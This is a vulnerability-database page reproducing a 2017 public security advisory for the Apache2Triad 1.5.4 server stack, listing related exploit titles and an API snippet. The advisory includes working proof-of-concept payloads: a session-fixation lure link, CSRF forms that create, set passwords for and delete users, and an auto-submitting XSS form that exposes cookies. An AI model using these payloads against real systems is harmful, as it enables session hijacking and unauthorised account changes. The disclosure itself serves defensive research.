Menu

Improved exploit search engine. Try it out

"Apache2Triad 1.5.4 - Multiple Vulnerabilities"

Author

hyp3rlinx

Platform

php

Release date

2017-08-21

Release Date Title Type Platform Author
2019-07-15 "FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion" webapps php "Mohammed Althibyani"
2019-07-12 "MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting" webapps php "Metin Yunus Kandemir"
2019-07-08 "WordPress Plugin Like Button 1.6.0 - Authentication Bypass" webapps php "Benjamin Lim"
2019-07-08 "Karenderia Multiple Restaurant System 5.3 - SQL Injection" webapps php "Mehmet EMIROGLU"
2019-07-05 "Karenderia Multiple Restaurant System 5.3 - Local File Inclusion" webapps php "Mehmet EMIROGLU"
2019-07-02 "Centreon 19.04 - Remote Code Execution" webapps php Askar
2019-07-01 "ZoneMinder 1.32.3 - Cross-Site Scripting" webapps php "Joey Lane"
2019-07-01 "CiuisCRM 1.6 - 'eventType' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-07-01 "WorkSuite PRM 2.4 - 'password' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-06-28 "LibreNMS 1.46 - 'addhost' Remote Code Execution" webapps php Askar
2019-06-25 "WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting" webapps php m0ze
2019-06-25 "WordPress Plugin iLive 1.0.4 - Cross-Site Scripting" webapps php m0ze
2019-06-25 "AZADMIN CMS 1.0 - SQL Injection" webapps php "felipe andrian"
2019-06-24 "SeedDMS versions < 5.1.11 - Remote Command Execution" webapps php "Nimit Jain"
2019-06-24 "SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting" webapps php "Nimit Jain"
2019-06-24 "SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting" webapps php "Nimit Jain"
2019-06-24 "dotProject 2.1.9 - SQL Injection" webapps php "Metin Yunus Kandemir"
2019-06-20 "WebERP 4.15 - SQL injection" webapps php "Semen Alexandrovich Lyhin"
2019-06-17 "AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)" remote php AkkuS
2019-06-12 "FusionPBX 4.4.3 - Remote Command Execution" webapps php "Dustin Cobb"
2019-06-11 "phpMyAdmin 4.8 - Cross-Site Request Forgery" webapps php Riemann
2019-06-11 "WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution" webapps php xulchibalraa
2019-06-10 "UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting" webapps php Unk9vvN
2019-06-04 "IceWarp 10.4.4 - Local File Inclusion" webapps php JameelNabbo
2019-06-03 "WordPress Plugin Form Maker 1.13.3 - SQL Injection" webapps php "Daniele Scanu"
2019-06-03 "KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities" webapps php SlidingWindow
2019-05-29 "pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Chi Tran"
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2019-05-23 "Nagios XI 5.6.1 - SQL injection" webapps php JameelNabbo
2019-05-22 "Horde Webmail 5.2.22 - Multiple Vulnerabilities" webapps php InfinitumIT
Release Date Title Type Platform Author
2019-07-17 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow" remote windows hyp3rlinx
2019-07-16 "Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection" dos windows hyp3rlinx
2019-06-17 "HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write" dos windows hyp3rlinx
2019-05-03 "Windows PowerShell ISE - Remote Code Execution" local windows hyp3rlinx
2019-04-12 "Microsoft Internet Explorer 11 - XML External Entity Injection" local windows hyp3rlinx
2019-03-13 "Microsoft Windows - .reg File / Dialog Box Message Spoofing" dos windows hyp3rlinx
2019-01-23 "Microsoft Windows CONTACT - HTML Injection / Remote Code Execution" local windows hyp3rlinx
2019-01-17 "Microsoft Windows CONTACT - Remote Code Execution" local windows hyp3rlinx
2019-01-15 "Microsoft Windows VCF - Remote Code Execution" local windows hyp3rlinx
2018-12-04 "NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage" webapps hardware hyp3rlinx
2018-11-13 "Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service" dos windows hyp3rlinx
2018-11-12 "D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery" webapps hardware hyp3rlinx
2018-10-23 "ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection" webapps windows hyp3rlinx
2018-09-03 "FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection" webapps windows hyp3rlinx
2018-08-29 "Argus Surveillance DVR 4.0.0.0 - Directory Traversal" webapps windows_x86 hyp3rlinx
2017-12-01 "Artica Web Proxy 3.06 - Remote Code Execution" webapps php hyp3rlinx
2017-12-01 "MistServer 2.12 - Cross-Site Scripting" webapps multiple hyp3rlinx
2017-10-15 "Webmin 1.850 - Multiple Vulnerabilities" webapps cgi hyp3rlinx
2017-09-28 "Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection" webapps php hyp3rlinx
2017-09-28 "Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery" webapps php hyp3rlinx
2017-09-28 "Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure" webapps php hyp3rlinx
2017-09-28 "Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption" webapps windows hyp3rlinx
2017-09-28 "Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure" webapps php hyp3rlinx
2017-08-21 "Apache2Triad 1.5.4 - Multiple Vulnerabilities" webapps php hyp3rlinx
2017-06-05 "Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting" webapps windows hyp3rlinx
2017-06-05 "Subsonic 6.1.1 - Server-Side Request Forgery" webapps windows hyp3rlinx
2017-06-05 "Subsonic 6.1.1 - Cross-Site Request Forgery" webapps windows hyp3rlinx
2017-05-20 "Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery" webapps php hyp3rlinx
2017-05-15 "Mailcow 0.14 - Cross-Site Request Forgery" webapps php hyp3rlinx
2017-04-16 "Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset" webapps php hyp3rlinx
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/42520/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/42520/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/42520/39036/apache2triad-154-multiple-vulnerabilities/download/", "exploit_id": "42520", "exploit_description": "\"Apache2Triad 1.5.4 - Multiple Vulnerabilities\"", "exploit_date": "2017-08-21", "exploit_author": "hyp3rlinx", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
[+] Credits: John Page AKA hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/APACHE2TRIAD-SERVER-STACK-v1.5.4-MULTIPLE-CVE.txt
[+] ISR: ApparitionSec            
 

Vendor:
===============
apache2triad.net
https://sourceforge.net/projects/apache2triad/



Product:
===========
Apache2Triad v1.5.4

Apache2Triad spells instant and facile deployment of web software on any windows server along the lines of the WAMP paradigm
in a point and click manner in just minutes and is a ideal solution for the setup of server farms.



Vulnerability Type(s):
======================
Session Fixation
Cross Site Request Forgery
Persistent Cross Site Scripting


CVE Reference:
==============
CVE-2017-12965 (Session Fixation)
CVE-2017-12970 (Cross Site Request Forgery)
CVE-2017-12971 (Persistent Cross Site Scripting)

This application is old and not actively developed according to the website, yet it is still avail for download so
I release the advisory.


Security Issue(S):
================
CVE-2017-12965

Apache2Triad allows remote attackers to set an arbitrary PHPSESSID cookie, if a Apache2Triad user authenticates using the
attacker controlled PHPSESSID the attacker can then access the Apache2Triad Web application with same level of access
as that of the victim to potentially take over the Apache2Triad system.

e.g.

Pre - Authentication
a4ce6912be9d29a9ba4106c989859e7b

Post - Authentication
a4ce6912be9d29a9ba4106c989859e7b

We see the PHPSESSID is never regenerated, to make matters worse Apache2Triad will happily accept an abitrary attacker
supplied session cookie and persist it. Our evil cookie will get written here "C:\apache2triad\temp" as sess_HACKED123.

set our cookie like,

Attacker lure:
<a href="http://VICTIM-IP/phpsftpd/?PHPSESSID=HACKED123">Important message</a>

Victim logs on using our lure.

HTTP 200 OK
Response cookies	
PHPSESSID	
value	"HACKED123"
path	"/"
Request cookies	
PHPSESSID	"HACKED123"


Since we control the PHP Session ID and it persists across applications we can then jump to "phpxmail"
using above session and have an authenticated session avail to do whatever we wish.

e.g.

http://VICTIM-IP/phpxmail/?PHPSESSID=HACKED123

Now access some arbitrary application resource bypassing normal authentication.
http://VICTIM-IP/phpxmail/main.php?action=servercmd

Tested successfully in Firefox, IE


CVE-2017-12970

Remote attackers who can trick an authenticated Apache2Triad user to visit a malicious webpage or link can execute HTTP Requests
on behalf of the authenticated user, attackers can then add or delete arbitrary users to the affected system. 

Tested successfully in Firefox, IE


CVE-2017-12971

Remote attackers can execute arbitrary code that will run in the security context of the victims browser, if
an authenticated user visits an attacker controlled webpage or link.

Since Apache2Triad has Session Fixation flaw, we can leverage this to potentially bypass normal authentication. 
XSS payload will get written to the "slimftpd.conf" configuration file under "C:\apache2triad\ftp" directory.

e.g.

<User "\"/><script>alert(document.cookie)</script>">

</User>


Tested successfully in Firefox


Exploit/POC(s):
==============
CVE-2017-12965 (Session Fixation)

1) Create lure with a attacker controlled PHPSESSID, something like...

<a href="http://VICTIM-IP/phpsftpd/?PHPSESSID=HACKED123">You have new messages, logon to view</a>

2) Authenticate to Apache2Triad using that link

3) Open another Web Browser using above attacker supplied link. You can now access the vulnerable
application using same PHPSESSID session cookie from another browser.


CVE-2017-12970 (CSRF)

Add user

<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
<input type="hidden" name="account" value="PWNU">
<input type="hidden" name="create" value="Create+New+User">
<script>//document.forms[0].submit()</script>
</form>

HTTP Response:
"The account PWNU was sucesfully created"

Create  password

<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
<input type="hidden" name="Username_d" value="PWNU">
<input type="hidden" name="Password_d" value="abc123">
<input type="hidden" name="update" value="Update+Settings">
<input type="hidden" name="account" value="PWNU">
<input type="hidden" name="instructions" value="">
<script>//document.forms[1].submit()</script>
</form>

HTTP Response:
"The account PWNU was sucesfully updated"


Delete users

<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
<input type="hidden" name="delete" value="Yes">
<input type="hidden" name="account" value="PWNU">
<script>//document.forms[2].submit()</script>
</form>

HTTP Response:
"The account PWNU was sucesfully deleted"


CVE-2017-12971 (XSS)

<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
<input type="hidden" name="account" value='"/><script>alert(document.cookie)</script>'>
<input type="hidden" name="create" value="Create+New+User">
<script>document.forms[0].submit()</script>
</form>


HTTP Response example:
"PHPSESSID=HACKED123"


Network Access:
===============
Remote



Severity:
=========
High



Disclosure Timeline:
=============================
Vendor Notification: "No longer being maintained"
August 21, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx